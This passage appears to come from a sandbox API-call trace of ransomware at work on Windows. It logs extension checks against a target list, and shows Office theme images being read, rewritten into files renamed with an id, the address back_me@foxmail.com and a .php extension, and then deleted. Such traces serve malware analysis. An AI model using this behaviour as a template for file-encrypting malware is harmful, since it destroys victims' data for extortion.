[0048.503] lstrlenW (lpString=".rar") returned 4 [0048.503] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.503] lstrlenW (lpString=".bz2") returned 4 [0048.503] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.503] lstrlenW (lpString=".7z") returned 3 [0048.503] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.503] lstrlenW (lpString=".dbf") returned 4 [0048.503] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.503] lstrlenW (lpString=".1cd") returned 4 [0048.503] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.503] lstrlenW (lpString=".jpg") returned 4 [0048.503] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.504] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.504] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.504] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=27177) returned 1 [0048.504] CloseHandle (hObject=0x1b0) returned 1 [0048.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 0x20 [0048.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.504] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.504] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.505] GetLastError () returned 0x0 [0048.505] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x6a29, lpOverlapped=0x0) returned 1 [0048.507] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x6a30, lpOverlapped=0x0) returned 1 [0048.508] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.508] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.508] SetEndOfFile (hFile=0x214) returned 1 [0048.508] CloseHandle (hObject=0x214) returned 1 [0048.508] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.508] SetEndOfFile (hFile=0x1b0) returned 1 [0048.509] CloseHandle (hObject=0x1b0) returned 1 [0048.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.509] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".doc") returned 4 [0048.510] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString=".docx") returned 5 [0048.510] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.510] lstrlenW (lpString=".pdf") returned 4 [0048.510] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString=".xls") returned 4 [0048.510] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.510] lstrlenW (lpString=".xlsx") returned 5 [0048.510] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.510] lstrlenW (lpString=".ppt") returned 4 [0048.510] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".zip") returned 4 [0048.510] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.510] lstrlenW (lpString=".rar") returned 4 [0048.510] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.510] lstrlenW (lpString=".bz2") returned 4 [0048.510] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString=".7z") returned 3 [0048.510] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".dbf") returned 4 [0048.510] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".1cd") returned 4 [0048.510] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.510] lstrlenW (lpString=".jpg") returned 4 [0048.510] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.511] lstrlenW (lpString=".doc") returned 4 [0048.511] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.511] lstrlenW (lpString=".docx") returned 5 [0048.511] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.511] lstrlenW (lpString=".pdf") returned 4 [0048.511] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.511] lstrlenW (lpString=".xls") returned 4 [0048.511] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.511] lstrlenW (lpString=".xlsx") returned 5 [0048.511] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.511] lstrlenW (lpString=".ppt") returned 4 [0048.511] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.511] lstrlenW (lpString=".zip") returned 4 [0048.511] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.511] lstrlenW (lpString=".rar") returned 4 [0048.511] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.511] lstrlenW (lpString=".bz2") returned 4 [0048.511] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.511] lstrlenW (lpString=".7z") returned 3 [0048.511] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.511] lstrlenW (lpString=".dbf") returned 4 [0048.511] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.511] lstrlenW (lpString=".1cd") returned 4 [0048.511] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.511] lstrlenW (lpString=".jpg") returned 4 [0048.511] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.512] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.512] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.512] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2209) returned 1 [0048.512] CloseHandle (hObject=0x1b0) returned 1 [0048.512] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 0x20 [0048.512] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.512] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.512] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.514] GetLastError () returned 0x0 [0048.514] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x8a1, lpOverlapped=0x0) returned 1 [0048.516] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x8b0, lpOverlapped=0x0) returned 1 [0048.516] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.516] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.517] SetEndOfFile (hFile=0x214) returned 1 [0048.517] CloseHandle (hObject=0x214) returned 1 [0048.517] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.517] SetEndOfFile (hFile=0x1b0) returned 1 [0048.518] CloseHandle (hObject=0x1b0) returned 1 [0048.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.518] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 1 [0048.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.518] lstrlenW (lpString=".doc") returned 4 [0048.519] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.519] lstrlenW (lpString=".docx") returned 5 [0048.519] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.519] lstrlenW (lpString=".pdf") returned 4 [0048.519] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.519] lstrlenW (lpString=".xls") returned 4 [0048.519] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.519] lstrlenW (lpString=".xlsx") returned 5 [0048.519] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.519] lstrlenW (lpString=".ppt") returned 4 [0048.519] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.519] lstrlenW (lpString=".zip") returned 4 [0048.519] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.519] lstrlenW (lpString=".rar") returned 4 [0048.519] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.519] lstrlenW (lpString=".bz2") returned 4 [0048.519] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.519] lstrlenW (lpString=".7z") returned 3 [0048.519] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.519] lstrlenW (lpString=".dbf") returned 4 [0048.519] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.519] lstrlenW (lpString=".1cd") returned 4 [0048.519] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.519] lstrlenW (lpString=".jpg") returned 4 [0048.519] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.519] lstrlenW (lpString=".doc") returned 4 [0048.519] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.520] lstrlenW (lpString=".docx") returned 5 [0048.520] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.520] lstrlenW (lpString=".pdf") returned 4 [0048.520] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.520] lstrlenW (lpString=".xls") returned 4 [0048.520] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.520] lstrlenW (lpString=".xlsx") returned 5 [0048.520] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.520] lstrlenW (lpString=".ppt") returned 4 [0048.520] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.520] lstrlenW (lpString=".zip") returned 4 [0048.520] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.520] lstrlenW (lpString=".rar") returned 4 [0048.520] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.520] lstrlenW (lpString=".bz2") returned 4 [0048.520] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.520] lstrlenW (lpString=".7z") returned 3 [0048.520] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.520] lstrlenW (lpString=".dbf") returned 4 [0048.520] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.520] lstrlenW (lpString=".1cd") returned 4 [0048.520] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.520] lstrlenW (lpString=".jpg") returned 4 [0048.520] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.520] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.520] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.521] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=21812) returned 1 [0048.521] CloseHandle (hObject=0x1b0) returned 1 [0048.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 0x20 [0048.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.521] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.521] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.522] GetLastError () returned 0x0 [0048.522] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x5534, lpOverlapped=0x0) returned 1 [0048.861] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x5540, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x5540, lpOverlapped=0x0) returned 1 [0048.863] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.863] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.863] SetEndOfFile (hFile=0x214) returned 1 [0048.863] CloseHandle (hObject=0x214) returned 1 [0048.863] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.863] SetEndOfFile (hFile=0x1b0) returned 1 [0048.864] CloseHandle (hObject=0x1b0) returned 1 [0048.864] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.864] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1 [0048.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.864] lstrlenW (lpString=".doc") returned 4 [0048.864] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.864] lstrlenW (lpString=".docx") returned 5 [0048.865] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.865] lstrlenW (lpString=".pdf") returned 4 [0048.865] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.865] lstrlenW (lpString=".xls") returned 4 [0048.865] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.865] lstrlenW (lpString=".xlsx") returned 5 [0048.865] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.865] lstrlenW (lpString=".ppt") returned 4 [0048.865] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.865] lstrlenW (lpString=".zip") returned 4 [0048.865] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.865] lstrlenW (lpString=".rar") returned 4 [0048.865] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.865] lstrlenW (lpString=".bz2") returned 4 [0048.865] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.865] lstrlenW (lpString=".7z") returned 3 [0048.865] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.865] lstrlenW (lpString=".dbf") returned 4 [0048.865] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.865] lstrlenW (lpString=".1cd") returned 4 [0048.865] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.865] lstrlenW (lpString=".jpg") returned 4 [0048.865] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.865] lstrlenW (lpString=".doc") returned 4 [0048.865] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.865] lstrlenW (lpString=".docx") returned 5 [0048.865] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.866] lstrlenW (lpString=".pdf") returned 4 [0048.866] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.866] lstrlenW (lpString=".xls") returned 4 [0048.866] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.866] lstrlenW (lpString=".xlsx") returned 5 [0048.866] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.866] lstrlenW (lpString=".ppt") returned 4 [0048.866] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.866] lstrlenW (lpString=".zip") returned 4 [0048.866] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.866] lstrlenW (lpString=".rar") returned 4 [0048.866] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.866] lstrlenW (lpString=".bz2") returned 4 [0048.866] lstrcmpiW 